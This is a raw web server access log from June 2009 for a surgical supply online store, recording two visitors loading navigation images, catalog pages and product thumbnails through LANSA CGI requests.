70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:06 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:07 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG HTTP/1.1" 200 37529 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:08 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:08 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:08 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:08 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:08 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:08 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:08 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:08 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:08 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:08 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:09 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:10 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:10 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:10 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:10 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:10 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F874F4ED2370067CE046+M37+ENG HTTP/1.1" 200 38054 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87494CE287006A8E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F87474E022700718E046+M37+ENG HTTP/1.1" 200 76520 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874F4ED2370067CE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:24 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87474E022700718E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:24 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87474E022700718E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:24 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F87474E022700718E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F874F4F02D700741E046+M37+ENG HTTP/1.1" 200 68886 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:30 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874F4F02D700741E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:30 -0400] "GET /images/next_white.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874F4F02D700741E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:30 -0400] "GET /images/fav_a-a.gif HTTP/1.1" 200 281 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874F4F02D700741E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:30 -0400] "GET /images/addtocart.gif HTTP/1.1" 200 591 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874F4F02D700741E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:31 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:33 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:33 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:34 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:34 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:34 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:34 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:35 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:35 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:35 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:36 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:36 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:36 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:38 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:38 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:38 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:39 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:39 -0400] "GET /images/next_white-over.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874F4F02D700741E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:48:39 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:39 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F874544820700826E046+M37+ENG HTTP/1.1" 200 68472 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874F4F02D700741E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:41 -0400] "GET /images/previous_white.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874544820700826E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:46 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F874F46427700861E046+M37+ENG HTTP/1.1" 200 70946 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874544820700826E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:47 -0400] "GET /images/items/00200106_THUMB.JPG HTTP/1.1" 200 1533 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874F46427700861E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:47 -0400] "GET /images/items/0030020_THUMB.JPG HTTP/1.1" 200 2942 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F874F46427700861E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
